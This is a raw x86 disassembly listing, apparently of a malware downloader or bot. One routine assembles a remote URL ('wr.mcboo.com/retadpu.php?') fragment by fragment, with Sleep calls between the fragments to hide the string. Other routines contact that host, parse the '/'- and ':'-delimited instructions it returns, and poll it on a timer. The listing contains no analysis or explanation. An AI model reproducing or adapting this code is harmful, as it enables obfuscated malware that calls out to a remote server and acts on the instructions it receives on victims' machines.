mov edx, [ebp+var_2858]
mov [ebp+var_285C], edx
mov byte ptr [ebp+var_4], 0Dh
mov eax, [ebp+var_285C]
push eax
lea ecx, [ebp+var_27D0]
push ecx
call sub_431654
mov [ebp+var_2860], eax
mov edx, [ebp+var_2860]
mov [ebp+var_2864], edx
mov byte ptr [ebp+var_4], 0Eh
mov eax, [ebp+var_2864]
push eax
lea ecx, [ebp+var_27D4]
push ecx
call sub_43165A
mov [ebp+var_2868], eax
mov edx, [ebp+var_2868]
mov [ebp+var_286C], edx
mov byte ptr [ebp+var_4], 0Fh
mov eax, [ebp+var_286C]
push eax
lea ecx, [ebp+var_27D8]
push ecx
call sub_431654
mov [ebp+var_2870], eax
mov edx, [ebp+var_2870]
mov [ebp+var_2874], edx
mov byte ptr [ebp+var_4], 10h
mov eax, [ebp+var_2874]
push eax
lea ecx, [ebp+var_27DC]
push ecx
call sub_43165A
mov [ebp+var_2878], eax
mov edx, [ebp+var_2878]
mov [ebp+var_287C], edx
mov byte ptr [ebp+var_4], 11h
mov eax, [ebp+var_287C]
push eax
lea ecx, [ebp+var_27E0]
push ecx
call sub_431654
mov [ebp+var_2880], eax
mov edx, [ebp+var_2880]
mov [ebp+var_2884], edx
mov byte ptr [ebp+var_4], 12h
mov eax, [ebp+var_2884]
push eax
lea ecx, [ebp+var_27E4]
push ecx
call sub_43165A
mov [ebp+var_2888], eax
mov edx, [ebp+var_2888]
mov [ebp+var_288C], edx
mov byte ptr [ebp+var_4], 13h
mov eax, [ebp+var_288C]
push eax
lea ecx, [ebp+var_27E8]
push ecx
call sub_431654
mov [ebp+var_2890], eax
mov edx, [ebp+var_2890]
mov [ebp+var_2894], edx
mov byte ptr [ebp+var_4], 14h
mov eax, [ebp+var_2894]
push eax
lea ecx, [ebp+var_27EC]
push ecx
call sub_43165A
mov [ebp+var_2898], eax
mov edx, [ebp+var_2898]
mov [ebp+var_289C], edx
mov byte ptr [ebp+var_4], 15h
mov eax, [ebp+var_289C]
push eax
lea ecx, [ebp+var_27F0]
push ecx
call sub_43165A
mov [ebp+var_28A0], eax
mov edx, [ebp+var_28A0]
mov [ebp+var_28A4], edx
mov byte ptr [ebp+var_4], 16h
mov eax, [ebp+var_28A4]
push eax
lea ecx, [ebp+var_18]
call sub_431648
mov byte ptr [ebp+var_4], 15h
lea ecx, [ebp+var_27F0]
call sub_431642
mov byte ptr [ebp+var_4], 14h
lea ecx, [ebp+var_27EC]
call sub_431642
mov byte ptr [ebp+var_4], 13h
lea ecx, [ebp+var_27E8]
call sub_431642
mov byte ptr [ebp+var_4], 12h
lea ecx, [ebp+var_27E4]
call sub_431642
mov byte ptr [ebp+var_4], 11h
lea ecx, [ebp+var_27E0]
call sub_431642
mov byte ptr [ebp+var_4], 10h
lea ecx, [ebp+var_27DC]
call sub_431642
mov byte ptr [ebp+var_4], 0Fh
lea ecx, [ebp+var_27D8]
call sub_431642
mov byte ptr [ebp+var_4], 0Eh
lea ecx, [ebp+var_27D4]
call sub_431642
mov byte ptr [ebp+var_4], 0Dh
lea ecx, [ebp+var_27D0]
call sub_431642
mov byte ptr [ebp+var_4], 0Ch
lea ecx, [ebp+var_27CC]
call sub_431642
mov byte ptr [ebp+var_4], 0Bh
lea ecx, [ebp+var_27C8]
call sub_431642
mov byte ptr [ebp+var_4], 0Ah
lea ecx, [ebp+var_27C4]
call sub_431642
mov byte ptr [ebp+var_4], 9
lea ecx, [ebp+var_27C0]
call sub_431642
mov byte ptr [ebp+var_4], 8
lea ecx, [ebp+var_27BC]
call sub_431642
mov byte ptr [ebp+var_4], 7
lea ecx, [ebp+var_27B8]
call sub_431642
mov byte ptr [ebp+var_4], 6
lea ecx, [ebp+var_27B0]
call sub_431642
mov byte ptr [ebp+var_4], 5
lea ecx, [ebp+var_27AC]
call sub_431642
push offset aHtt ; "htt"
lea ecx, [ebp+var_279C]
push ecx
call dword_4330CC ; lstrcpyA
push 26h
call dword_4330E0 ; Sleep
push offset aP_0 ; "p://"
lea edx, [ebp+var_279C]
push edx
call dword_433078 ; lstrcatA
push 24h
call dword_4330E0 ; Sleep
push offset aWr_mc ; "wr.mc"
lea eax, [ebp+var_279C]
push eax
call dword_433078 ; lstrcatA
push 24h
call dword_4330E0 ; Sleep
push offset aBo ; "bo"
lea ecx, [ebp+var_279C]
push ecx
call dword_433078 ; lstrcatA
push 26h
call dword_4330E0 ; Sleep
push offset aO ; "o"
lea edx, [ebp+var_279C]
push edx
call dword_433078 ; lstrcatA
push 29h
call dword_4330E0 ; Sleep
push offset a_co ; ".co"
lea eax, [ebp+var_279C]
push eax
call dword_433078 ; lstrcatA
push 24h
call dword_4330E0 ; Sleep
push offset aMR ; "m/r"
lea ecx, [ebp+var_279C]
push ecx
call dword_433078 ; lstrcatA
push 23h
call dword_4330E0 ; Sleep
push offset aEta ; "eta"
lea edx, [ebp+var_279C]
push edx
call dword_433078 ; lstrcatA
push 24h
call dword_4330E0 ; Sleep
push offset aDpu_ ; "dpu."
lea eax, [ebp+var_279C]
push eax
call dword_433078 ; lstrcatA
push 23h
call dword_4330E0 ; Sleep
push offset aPh ; "ph"
lea ecx, [ebp+var_279C]
push ecx
call dword_433078 ; lstrcatA
push 22h
call dword_4330E0 ; Sleep
push offset aP? ; "p?"
lea edx, [ebp+var_279C]
push edx
call dword_433078 ; lstrcatA
push 24h
call dword_4330E0 ; Sleep
lea ecx, [ebp+var_18]
call sub_4226A0
push eax
lea eax, [ebp+var_279C]
push eax
call dword_433078 ; lstrcatA
lea ecx, [ebp+var_24]
push ecx
lea edx, [ebp+var_279C]
push edx
mov ecx, [ebp+var_2818]
add ecx, 8
call sub_422EC3
mov [ebp+var_14], eax
cmp [ebp+var_14], 64h
jnb short loc_428C79
mov [ebp+var_27F4], 0
mov byte ptr [ebp+var_4], 4
lea ecx, [ebp+var_1F9C]
call sub_429DB0
mov byte ptr [ebp+var_4], 3
lea ecx, [ebp+var_10]
call sub_4264A2
mov byte ptr [ebp+var_4], 2
lea ecx, [ebp+var_18]
call sub_431642
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_28]
call sub_431642
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_1C]
call sub_431642
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_20]
call sub_42414A
mov eax, [ebp+var_27F4]
jmp loc_429081
; ---------------------------------------------------------------------------
loc_428C79: ; CODE XREF: sub_42852F+6E5�j
mov eax, [ebp+var_14]
add eax, 1
push eax
mov ecx, [ebp+var_24]
push ecx
lea edx, [ebp+var_1F90]
push edx
call dword_4330C8 ; lstrcpynA
push 1Dh
call dword_4330E0 ; Sleep
mov eax, [ebp+var_14]
mov [ebp+eax+var_1F90], 0
mov ecx, [ebp+var_14]
push ecx
mov edx, [ebp+var_24]
push edx
lea eax, [ebp+var_27F8]
push eax
mov ecx, [ebp+var_2818]
add ecx, 8
call sub_42309C
mov [ebp+var_28A8], eax
mov ecx, [ebp+var_28A8]
mov [ebp+var_28AC], ecx
mov byte ptr [ebp+var_4], 17h
mov ecx, [ebp+var_28AC]
call sub_4226A0
push eax
lea edx, [ebp+var_1F90]
push edx
call dword_4330CC ; lstrcpyA
mov byte ptr [ebp+var_4], 5
lea ecx, [ebp+var_27F8]
call sub_431642
push 1Eh
call dword_4330E0 ; Sleep
lea eax, [ebp+var_1F90]
push eax
lea ecx, [ebp+var_20]
call sub_429980
push 1Dh
call dword_4330E0 ; Sleep
lea ecx, [ebp+var_20]
call sub_429A30
cmp eax, 63h
ja short loc_428D9D
lea ecx, [ebp+var_20]
call sub_429A00
push eax
call dword_433274
mov [ebp+var_27FC], 0FFFFFFFEh
mov byte ptr [ebp+var_4], 4
lea ecx, [ebp+var_1F9C]
call sub_429DB0
mov byte ptr [ebp+var_4], 3
lea ecx, [ebp+var_10]
call sub_4264A2
mov byte ptr [ebp+var_4], 2
lea ecx, [ebp+var_18]
call sub_431642
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_28]
call sub_431642
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_1C]
call sub_431642
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_20]
call sub_42414A
mov eax, [ebp+var_27FC]
jmp loc_429081
; ---------------------------------------------------------------------------
loc_428D9D: ; CODE XREF: sub_42852F+7FA�j
lea ecx, [ebp+var_38]
call sub_429AE0
mov byte ptr [ebp+var_4], 18h
push ecx
mov ecx, esp
mov [ebp+var_2800], esp
lea edx, [ebp+var_20]
push edx
call sub_429950
mov [ebp+var_28B0], eax
mov eax, [ebp+var_28B0]
mov [ebp+var_28B4], eax
mov byte ptr [ebp+var_4], 19h
lea ecx, [ebp+var_1F9C]
call sub_429DF0
mov ecx, eax
mov byte ptr [ebp+var_4], 18h
call sub_429D20
mov [ebp+var_28B6], ax
mov cx, [ebp+var_28B6]
push ecx
lea ecx, [ebp+var_38]
call sub_429B90
push 20h
call dword_4330E0 ; Sleep
lea ecx, [ebp+var_38]
call sub_429B00
and eax, 0FFh
cmp eax, 1
jnz loc_428F8D
lea edx, [ebp+var_2804]
push edx
lea ecx, [ebp+var_1F9C]
call sub_429DF0
mov ecx, eax
call sub_429CC0
mov [ebp+var_28BC], eax
mov eax, [ebp+var_28BC]
push eax
lea ecx, [ebp+var_10]
call sub_429E80
lea ecx, [ebp+var_2804]
call sub_4264A2
push ecx
mov ecx, esp
mov [ebp+var_2808], esp
lea edx, [ebp+var_10]
push edx
call sub_429E20
mov [ebp+var_28C0], eax
mov ecx, [ebp+var_2818]
add ecx, 8
call sub_424429
mov [ebp+var_28C4], eax
mov eax, [ebp+var_28C4]
mov [ebp+var_1F98], eax
mov ecx, [ebp+var_1F98]
imul ecx, 1400Ch
mov [ebp+var_27A4], ecx
cmp [ebp+var_1F98], 0
jnz short loc_428EC8
push 20h
call dword_4330E0 ; Sleep
mov edx, [ebp+var_27A4]
push edx
call dword_4331C8 ; malloc
add esp, 4
mov [ebp+var_27A0], eax
jmp short loc_428EE6
; ---------------------------------------------------------------------------
loc_428EC8: ; CODE XREF: sub_42852F+977�j
push 20h
call dword_4330E0 ; Sleep
mov eax, [ebp+var_27A4]
push eax
call dword_4331C8 ; malloc
add esp, 4
mov [ebp+var_27A0], eax
loc_428EE6: ; CODE XREF: sub_42852F+997�j
mov ecx, [ebp+var_27A4]
push ecx
push 0
mov edx, [ebp+var_27A0]
push edx
call sub_431752 ; memset
add esp, 0Ch
push 20h
call dword_4330E0 ; Sleep
mov eax, [ebp+var_1F98]
push eax
mov ecx, [ebp+var_27A0]
push ecx
mov ecx, [ebp+var_2818]
add ecx, 8
call sub_42334C
push 1Fh
call dword_4330E0 ; Sleep
mov edx, [ebp+var_27A0]
push edx
push ecx
mov ecx, esp
mov [ebp+var_280C], esp
lea eax, [ebp+var_10]
push eax
call sub_429E20
mov [ebp+var_28C8], eax
mov ecx, [ebp+var_2818]
add ecx, 8
call sub_42342D
push 20h
call dword_4330E0 ; Sleep
mov ecx, [ebp+var_1F98]
push ecx
mov edx, [ebp+var_27A0]
push edx
mov ecx, [ebp+var_2818]
add ecx, 8
call sub_4245AA
mov eax, [ebp+var_27A0]
push eax
call dword_4331D4 ; free
add esp, 4
jmp short loc_429008
; ---------------------------------------------------------------------------
loc_428F8D: ; CODE XREF: sub_42852F+8E7�j
lea ecx, [ebp+var_20]
call sub_429A00
push eax
call dword_433274
mov [ebp+var_2810], 0FFFFFFFDh
mov byte ptr [ebp+var_4], 5
lea ecx, [ebp+var_38]
call sub_429CA0
mov byte ptr [ebp+var_4], 4
lea ecx, [ebp+var_1F9C]
call sub_429DB0
mov byte ptr [ebp+var_4], 3
lea ecx, [ebp+var_10]
call sub_4264A2
mov byte ptr [ebp+var_4], 2
lea ecx, [ebp+var_18]
call sub_431642
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_28]
call sub_431642
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_1C]
call sub_431642
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_20]
call sub_42414A
mov eax, [ebp+var_2810]
jmp short loc_429081
; ---------------------------------------------------------------------------
loc_429008: ; CODE XREF: sub_42852F+A5C�j
lea ecx, [ebp+var_20]
call sub_429A00
push eax
call dword_433274
mov [ebp+var_2814], 1
mov byte ptr [ebp+var_4], 5
lea ecx, [ebp+var_38]
call sub_429CA0
mov byte ptr [ebp+var_4], 4
lea ecx, [ebp+var_1F9C]
call sub_429DB0
mov byte ptr [ebp+var_4], 3
lea ecx, [ebp+var_10]
call sub_4264A2
mov byte ptr [ebp+var_4], 2
lea ecx, [ebp+var_18]
call sub_431642
mov byte ptr [ebp+var_4], 1
lea ecx, [ebp+var_28]
call sub_431642
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_1C]
call sub_431642
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_20]
call sub_42414A
mov eax, [ebp+var_2814]
loc_429081: ; CODE XREF: sub_42852F+131�j
; sub_42852F+745�j ...
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_42852F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42908F proc near ; CODE XREF: sub_4294E5+B0�p
var_807C = dword ptr -807Ch
var_8078 = dword ptr -8078h
var_8074 = dword ptr -8074h
var_8070 = dword ptr -8070h
var_806C = dword ptr -806Ch
var_8068 = dword ptr -8068h
var_8064 = dword ptr -8064h
var_8060 = dword ptr -8060h
var_805C = dword ptr -805Ch
var_8058 = dword ptr -8058h
var_8054 = dword ptr -8054h
var_8050 = dword ptr -8050h
var_804C = dword ptr -804Ch
var_8048 = dword ptr -8048h
var_8044 = dword ptr -8044h
var_8040 = byte ptr -8040h
var_803C = byte ptr -803Ch
var_8038 = byte ptr -8038h
var_8034 = byte ptr -8034h
var_8030 = byte ptr -8030h
var_802C = byte ptr -802Ch
var_8028 = byte ptr -8028h
var_8024 = byte ptr -8024h
var_8020 = byte ptr -8020h
var_801C = byte ptr -801Ch
var_8018 = dword ptr -8018h
var_8014 = byte ptr -8014h
var_6014 = byte ptr -6014h
var_4014 = byte ptr -4014h
var_4010 = byte ptr -4010h
var_2010 = byte ptr -2010h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_42908F
mov eax, large fs:0
push eax
mov large fs:0, esp
mov eax, 8070h
call sub_431700
mov [ebp+var_8044], ecx
mov [ebp+var_801C], 1
lea ecx, [ebp+var_4014]
call sub_43164E
mov [ebp+var_4], 0
push offset dword_43BD30
lea ecx, [ebp+var_4014]
call sub_431648
lea ecx, [ebp+var_4014]
call sub_428280
test eax, eax
jnz short loc_42913B
lea eax, [ebp+var_8024]
push eax
mov ecx, [ebp+var_8044]
add ecx, 8
call sub_425C0B
mov [ebp+var_8048], eax
mov ecx, [ebp+var_8048]
mov [ebp+var_804C], ecx
mov byte ptr [ebp+var_4], 1
mov edx, [ebp+var_804C]
push edx
lea ecx, [ebp+var_4014]
call sub_431648
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_8024]
call sub_431642
loc_42913B: ; CODE XREF: sub_42908F+5E�j
lea ecx, [ebp+var_4014]
call sub_4226A0
push eax
lea eax, [ebp+var_6014]
push eax
call dword_4330CC ; lstrcpyA
lea ecx, [ebp+var_6014]
push ecx
call dword_4330B4 ; lstrlenA
push eax
lea edx, [ebp+var_6014]
push edx
lea eax, [ebp+var_8028]
push eax
mov ecx, [ebp+var_8044]
add ecx, 8
call sub_42309C
mov [ebp+var_8050], eax
mov ecx, [ebp+var_8050]
mov [ebp+var_8054], ecx
mov byte ptr [ebp+var_4], 2
mov edx, [ebp+var_8054]
push edx
lea ecx, [ebp+var_4014]
call sub_431648
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_8028]
call sub_431642
lea ecx, [ebp+var_4014]
call sub_4226A0
push eax
lea eax, [ebp+var_8014]
push eax
call dword_433298 ; wsprintfA
add esp, 8
movsx ecx, [ebp+var_8014]
cmp ecx, 2Fh
jnz loc_42949A
push 0
push 1
lea edx, [ebp+var_8014]
push edx
lea eax, [ebp+var_802C]
push eax
lea ecx, [ebp+var_8020]
call sub_421ACF
mov [ebp+var_8058], eax
mov ecx, [ebp+var_8058]
mov [ebp+var_805C], ecx
mov byte ptr [ebp+var_4], 3
mov ecx, [ebp+var_805C]
call sub_4226A0
push eax
lea edx, [ebp+var_8014]
push edx
call sub_431758 ; strcpy
add esp, 8
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_802C]
call sub_431642
loc_42923E: ; CODE XREF: sub_42908F:loc_429495�j
push 2Fh
lea eax, [ebp+var_8014]
push eax
lea ecx, [ebp+var_8020]
call sub_421A20
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz loc_42949A
cmp [ebp+var_10], 0FFFFFFFFh
jnz short loc_42927B
lea ecx, [ebp+var_8014]
push ecx
lea edx, [ebp+var_4010]
push edx
call dword_4330CC ; lstrcpyA
jmp short loc_4292D8
; ---------------------------------------------------------------------------
loc_42927B: ; CODE XREF: sub_42908F+1D4�j
mov eax, [ebp+var_10]
push eax
push 0
lea ecx, [ebp+var_8014]
push ecx
lea edx, [ebp+var_8030]
push edx
lea ecx, [ebp+var_8020]
call sub_421ACF
mov [ebp+var_8060], eax
mov eax, [ebp+var_8060]
mov [ebp+var_8064], eax
mov byte ptr [ebp+var_4], 4
mov ecx, [ebp+var_8064]
call sub_4226A0
push eax
lea ecx, [ebp+var_4010]
push ecx
call dword_4330CC ; lstrcpyA
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_8030]
call sub_431642
loc_4292D8: ; CODE XREF: sub_42908F+1EA�j
push 0
mov edx, [ebp+var_10]
add edx, 1
push edx
lea eax, [ebp+var_8014]
push eax
lea ecx, [ebp+var_8034]
push ecx
lea ecx, [ebp+var_8020]
call sub_421ACF
mov [ebp+var_8068], eax
mov edx, [ebp+var_8068]
mov [ebp+var_806C], edx
mov byte ptr [ebp+var_4], 5
mov ecx, [ebp+var_806C]
call sub_4226A0
push eax
lea eax, [ebp+var_8014]
push eax
call dword_4330CC ; lstrcpyA
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_8034]
call sub_431642
push 3Ah
lea ecx, [ebp+var_4010]
push ecx
lea ecx, [ebp+var_8020]
call sub_421A20
mov [ebp+var_8018], eax
cmp [ebp+var_8018], 0FFFFFFFFh
jz loc_429424
mov edx, [ebp+var_8018]
push edx
push 0
lea eax, [ebp+var_4010]
push eax
lea ecx, [ebp+var_8038]
push ecx
lea ecx, [ebp+var_8020]
call sub_421ACF
mov [ebp+var_8070], eax
mov edx, [ebp+var_8070]
mov [ebp+var_8074], edx
mov byte ptr [ebp+var_4], 6
mov ecx, [ebp+var_8074]
call sub_4226A0
push eax
lea eax, [ebp+var_2010]
push eax
call dword_4330CC ; lstrcpyA
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_8038]
call sub_431642
push 0
mov ecx, [ebp+var_8018]
add ecx, 1
push ecx
lea edx, [ebp+var_4010]
push edx
lea eax, [ebp+var_803C]
push eax
lea ecx, [ebp+var_8020]
call sub_421ACF
mov [ebp+var_8078], eax
mov ecx, [ebp+var_8078]
mov [ebp+var_807C], ecx
mov byte ptr [ebp+var_4], 7
mov ecx, [ebp+var_807C]
call sub_4226A0
push eax
lea edx, [ebp+var_4010]
push edx
call dword_4330CC ; lstrcpyA
mov byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_803C]
call sub_431642
jmp short loc_42944E
; ---------------------------------------------------------------------------
loc_429424: ; CODE XREF: sub_42908F+2CA�j
lea eax, [ebp+var_4010]
push eax
lea ecx, [ebp+var_2010]
push ecx
call dword_4330CC ; lstrcpyA
push 2000h
push 0
lea edx, [ebp+var_4010]
push edx
call sub_431752 ; memset
add esp, 0Ch
loc_42944E: ; CODE XREF: sub_42908F+393�j
push 3
push offset aOld ; "old"
lea eax, [ebp+var_2010]
push eax
call dword_4331AC ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_42948D
lea ecx, [ebp+var_4010]
push ecx
call sub_4221DB
add esp, 4
test eax, eax
jz short loc_42948D
push 1
lea edx, [ebp+var_4010]
push edx
call sub_421C92
add esp, 8
loc_42948D: ; CODE XREF: sub_42908F+3D8�j
; sub_42908F+3EB�j
cmp [ebp+var_10], 0FFFFFFFFh
jnz short loc_429495
jmp short loc_42949A
; ---------------------------------------------------------------------------
loc_429495: ; CODE XREF: sub_42908F+402�j
jmp loc_42923E
; ---------------------------------------------------------------------------
loc_42949A: ; CODE XREF: sub_42908F+14C�j
; sub_42908F+1CA�j ...
mov ecx, [ebp+var_8044]
add ecx, 10h
call sub_428280
test eax, eax
jnz short loc_4294B3
mov [ebp+var_801C], 0
loc_4294B3: ; CODE XREF: sub_42908F+41B�j
mov al, [ebp+var_801C]
mov [ebp+var_8040], al
mov [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_4014]
call sub_431642
mov al, [ebp+var_8040]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_42908F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4294E5 proc near ; CODE XREF: sub_4296C8+F0�p
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_4294E5
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
sub esp, 30h
push ebx
push esi
push edi
mov [ebp+var_10], esp
mov [ebp+var_28], ecx
mov [ebp+var_4], 0
lea eax, [ebp+var_14]
push eax
call dword_4331A4 ; time
add esp, 4
mov ecx, [ebp+var_28]
add ecx, 2040h
push ecx
mov edx, esp
mov [ebp+var_20], esp
push ecx
mov ecx, edx
call sub_431636
mov [ebp+var_2C], eax
mov ecx, [ebp+var_28]
add ecx, 8
call sub_425FC6
push 24h
call dword_4330E0 ; Sleep
push 0
mov ecx, [ebp+var_28]
add ecx, 8
call sub_4255E6
mov [ebp+var_30], eax
mov eax, [ebp+var_28]
mov ecx, [ebp+var_30]
mov [eax], ecx
mov [ebp+var_18], 2
push 23h
call dword_4330E0 ; Sleep
loc_429572: ; CODE XREF: sub_4294E5:loc_42968F�j
mov edx, [ebp+var_28]
xor eax, eax
mov al, [edx+20h]
test eax, eax
jnz loc_429694
cmp [ebp+var_18], 2
jnz loc_429694
cmp [ebp+var_18], 0
jle short loc_42959A
mov ecx, [ebp+var_28]
call sub_42908F
loc_42959A: ; CODE XREF: sub_4294E5+AB�j
; sub_4294E5+E1�j
cmp [ebp+var_18], 0
jle short loc_4295AB
push 858h
call dword_4330E0 ; Sleep
loc_4295AB: ; CODE XREF: sub_4294E5+B9�j
cmp [ebp+var_18], 0FFFFFFFFh
jle short loc_4295BE
lea ecx, [ebp+var_14]
push ecx
call dword_4331A4 ; time
add esp, 4
loc_4295BE: ; CODE XREF: sub_4294E5+CA�j
mov edx, [ebp+var_28]
mov eax, [edx]
cmp eax, [ebp+var_14]
jg short loc_42959A
push 0
call dword_4332A8
test eax, eax
jge short loc_4295DB
xor al, al
jmp loc_4296B7
; ---------------------------------------------------------------------------
loc_4295DB: ; CODE XREF: sub_4294E5+ED�j
mov ecx, [ebp+var_28]
call sub_42852F
mov [ebp+var_34], eax
mov ecx, [ebp+var_34]
mov [ebp+var_1C], ecx
push 28h
call dword_4330E0 ; Sleep
call dword_4332A4
push 26h
call dword_4330E0 ; Sleep
cmp [ebp+var_1C], 0
jle short loc_429622
push 0
mov ecx, [ebp+var_28]
add ecx, 8
call sub_4255E6
mov [ebp+var_38], eax
mov edx, [ebp+var_28]
mov eax, [ebp+var_38]
mov [edx], eax
jmp short loc_42964D
; ---------------------------------------------------------------------------
loc_429622: ; CODE XREF: sub_4294E5+121�j
push 22h
call dword_4330E0 ; Sleep
push 15182h
mov ecx, [ebp+var_28]
add ecx, 8
call sub_4255E6
mov [ebp+var_3C], eax
mov ecx, [ebp+var_28]
mov edx, [ebp+var_3C]
mov [ecx], edx
push 23h
call dword_4330E0 ; Sleep
loc_42964D: ; CODE XREF: sub_4294E5+13B�j
lea eax, [ebp+var_14]
push eax
call dword_4331A4 ; time
add esp, 4
mov ecx, [ebp+var_28]
mov edx, [ecx]
cmp edx, [ebp+var_14]
jge short loc_42968F
push 24h
call dword_4330E0 ; Sleep
push 15181h
mov ecx, [ebp+var_28]
add ecx, 8
call sub_4255E6
mov [ebp+var_40], eax
mov eax, [ebp+var_28]
mov ecx, [ebp+var_40]
mov [eax], ecx
push 25h
call dword_4330E0 ; Sleep
loc_42968F: ; CODE XREF: sub_4294E5+17D�j
jmp loc_429572
; ---------------------------------------------------------------------------
loc_429694: ; CODE XREF: sub_4294E5+97�j
; sub_4294E5+A1�j
mov edx, [ebp+var_18]
add edx, 1
mov [ebp+var_18], edx
jmp short loc_4296AE
; ---------------------------------------------------------------------------
loc_42969F: ; DATA XREF: HLXc:00435D6C�o
mov [ebp+var_24], 0
mov eax, offset loc_4296A9
retn
; ---------------------------------------------------------------------------
loc_4296A9: ; DATA XREF: sub_4294E5+1BE�o
mov al, [ebp+var_24]
jmp short loc_4296B7
; ---------------------------------------------------------------------------
loc_4296AE: ; CODE XREF: sub_4294E5+1B8�j
mov [ebp+var_4], 0FFFFFFFFh
mov al, 1
loc_4296B7: ; CODE XREF: sub_4294E5+F1�j
; sub_4294E5+1C7�j
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4294E5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4296C8 proc near ; CODE XREF: HLXc:004318E9�p
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
mov eax, [ebp+arg_8]
push eax
mov ecx, offset dword_43BD30
call sub_43163C
push 20h
call dword_4330E0 ; Sleep
mov ecx, offset dword_439CF0
call sub_4294E5
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
xor eax, eax
pop edi
pop esi
pop ebx
pop ebp
retn 10h
sub_4296C8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429830 proc near ; CODE XREF: sub_428520+8�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_429830
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp+var_10], ecx
mov [ebp+var_4], 2
mov ecx, [ebp+var_10]
add ecx, 2040h
call sub_431642
mov byte ptr [ebp+var_4], 1
mov ecx, [ebp+var_10]
add ecx, 203Ch
call sub_431642
mov byte ptr [ebp+var_4], 0
mov ecx, [ebp+var_10]
add ecx, 8
call sub_422BB1
mov [ebp+var_4], 0FFFFFFFFh
mov ecx, [ebp+var_10]
add ecx, 4
call sub_431642
mov ecx, [ebp+var_C]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
sub_429830 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4298B0 proc near ; CODE XREF: sub_4284FF+8�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_4298B0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov [ebp+var_10], ecx
mov ecx, [ebp+var_10]
add ecx, 4
call sub_43164E
